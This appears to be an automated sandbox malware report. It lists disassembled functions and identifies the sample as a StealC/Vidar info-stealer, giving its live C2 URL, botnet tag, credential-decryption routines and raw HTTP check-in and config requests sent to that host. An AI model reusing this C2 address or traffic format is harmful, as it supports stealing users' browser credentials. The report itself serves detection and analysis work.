Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: e07b53af6949883d147e1d9a1bb350cd45ee5bd969441eb690700b4fa22e7093
Instruction ID: 2f8afa1bfbd632e2122db11536573a3e12c92245881313a4b57ecdbe5b3974f1
Opcode Fuzzy Hash: e07b53af6949883d147e1d9a1bb350cd45ee5bd969441eb690700b4fa22e7093
Instruction Fuzzy Hash: 6C413D71D10109AFEB08EFE4D885AFEB774FB55704F008018F516A6B90EB35AA05DFA2

Function 6C696470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6982BC,?,?), ref: 6C69649B

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6964A9

Part of subcall function 6C68FA80: GetCurrentThreadId.KERNEL32 ref: 6C68FA8D
Part of subcall function 6C68FA80: AcquireSRWLockExclusive.KERNEL32(6C6DF448), ref: 6C68FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C69653F
free.MOZGLUE(?), ref: 6C69655A

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction ID: 98cb846002616a141ddfcc5cd91472c026677bdcc18c31a34d08c92d525b97ac
Opcode Fuzzy Hash: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction Fuzzy Hash: 223161B5A04305AFD740CF15D88469AB7E4FF89314F00482EE85A97751DB34E919CBDA

Function 6C66B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C66B4F5
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B502
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B542
free.MOZGLUE(?), ref: 6C66B578

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction ID: f8c6926e3cb4d4af112b9870dfa7403b397d49b61d05b120268176a51f4f12c6
Opcode Fuzzy Hash: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction Fuzzy Hash: 85110330A04B41C7D321CF2AC8407A5B3B0FFDA319F14970AE84953E02EBB0B5C5879A

Function 6C693DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C65F20E,?), ref: 6C693DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C65F20E,00000000,?), ref: 6C693DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C693E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C693E0E

Part of subcall function 6C68CC00: GetCurrentProcess.KERNEL32(?,?,6C6531A7), ref: 6C68CC0D
Part of subcall function 6C68CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6531A7), ref: 6C68CC16

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction ID: 1eb75ff979cc5475eae7f49dcf4a0ee0aad8e9e8d9996727dab3d755bc266919
Opcode Fuzzy Hash: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction Fuzzy Hash: 9BF0F8B1A002087BDB00AB55EC81DAB376DEB87628F040021FE0957741D636BE6996FF

Function 008A92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(008A3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,008A3AEE,?), ref: 008A92FC
GetFileSizeEx.KERNEL32(000000FF,008A3AEE), ref: 008A9319
CloseHandle.KERNEL32(000000FF), ref: 008A9327

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f8463df7b922e992aa932b231bce9591e48ad9777910c46d7fa152ffd554dc51
Instruction ID: aaac69a016235cbfc4c1faa1e937048604199ffba8edd75a71edaa06f071a71e
Opcode Fuzzy Hash: f8463df7b922e992aa932b231bce9591e48ad9777910c46d7fa152ffd554dc51
Instruction Fuzzy Hash: 9FF01935E44208ABEF10DBE0DC49B9E77B9FB58711F108294F652E76C0DA7096018B40

Function 008AC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 008AC74E

Part of subcall function 008ABF9F: __amsg_exit.LIBCMT ref: 008ABFAF

__getptd.LIBCMT ref: 008AC765
__amsg_exit.LIBCMT ref: 008AC773
__updatetlocinfoEx_nolock.LIBCMT ref: 008AC797

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: 20ff232e0137d05fa91946f5e91da378df7db31d713d0adfc463874aac72177c
Instruction ID: 30acf7560ca891cf1f63ef729c9911cea2d1823e7f9c4464c8eb4d1a0aad53cb
Opcode Fuzzy Hash: 20ff232e0137d05fa91946f5e91da378df7db31d713d0adfc463874aac72177c
Instruction Fuzzy Hash: CCF06D32901A149FF725BBBC580674933A0FF02720F244149F414E6AD3DFA45980DE97

Function 6C65BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C65BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C65BE8F

Strings

0, xrefs: 6C65BE5B

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction ID: 5aff77c52a83a249f610f6a40117f5f17253505299baa17352f2cf3b02d9aadf
Opcode Fuzzy Hash: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction Fuzzy Hash: 6F41B171A09745CFC301CF28C481A9BB7F4AFCA388F544B1DF985A7611D730E9698B8A

Function 6C693CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693D19
mozalloc_abort.MOZGLUE(?), ref: 6C693D6C

Strings

d, xrefs: 6C693D58

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction ID: ae81405fb39a1e9092750637fc88ed10a7b0fe2e72f912b9bd23e2162f856e3d
Opcode Fuzzy Hash: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction Fuzzy Hash: 8111C435E0468997DB008F6ACC644EDB7B5EF86318F458229DD4997622EB30A688C398

Function 6C6B6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C6B6E22
__Init_thread_footer.LIBCMT ref: 6C6B6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C6B6E1D

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction ID: bcd68a56edc4a956bdd073aa2d8006e056c651a881adc380280f84d7f154e701
Opcode Fuzzy Hash: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction Fuzzy Hash: 2DF02E302492C08BDB008B69C8A1A9173B29303318F080165F80196FA2CB31F627CFAF

Function 6C666C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C42

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C58

Strings

0Kil, xrefs: 6C666C33, 6C666C41, 6C666C57

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kil
API String ID: 1967447596-1570486273
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 47a2848e409718a8f1d8a2683fe2594ab049f9b896a105d641ef50186a662689
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: F4E086F1A10D455B9F08D97FAC0956A71C88B553AC7044A35E823C6FC8FAB4E550815F

Function 6C6AB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB628

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C6AB127,?,?,?,?,?,?,?,?), ref: 6C6AB74D

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction ID: 085effcad87eddf0045659a872f45dad84b52f8dd6c581acd935d8d6010fba1a
Opcode Fuzzy Hash: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction Fuzzy Hash: 2251D071A0121A8FDB14CF98C98076EB7B1FF85308F55852DC85AAB710D771EC06CBA9

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Source: 0.2.file.exe.890000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.890000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00899B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00899B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0089C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00899AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00899AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00897240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00897240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_008A8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 45 42 33 45 31 39 32 30 43 32 32 33 31 32 30 32 37 36 32 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 44 2d 2d 0d 0a Data Ascii: ------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="hwid"1CEB3E1920C22312027626------IJKKKFCFHCFIECBGDHIDContent-Disposition: form-data; name="build"doma------IJKKKFCFHCFIECBGDHID--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFHCGIDBAAFHIDHDAAEHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 48 43 47 49 44 42 41 41 46 48 49 44 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 30 37 34 38 63 39 34 37 37 30 63 36 32 66 37 31 37 33 66 32 34 38 30 37 35 38 61 37 35 63 34 33 31 31 64 32 35 63 34 64 62 64 36 31 64 36 31 39 36 39 39 34 38 32 34 35 38 31 39 38 65 32 35 30 36 31 36 32 62 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 48 43 47 49 44 42 41 41 46 48 49 44 48 44 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 48 43 47 49 44 42 41 41 46 48 49 44 48 44 41 41 45 2d 2d 0d 0a Data Ascii: ------BKFHCGIDBAAFHIDHDAAEContent-Disposition: form-data; name="token"0f0748c94770c62f7173f2480758a75c4311d25c4dbd61d619699482458198e2506162b6------BKFHCGIDBAAFHIDHDAAEContent-Disposition: form-data; name="message"browsers------BKFHCGIDBAAFHIDHDAAE--
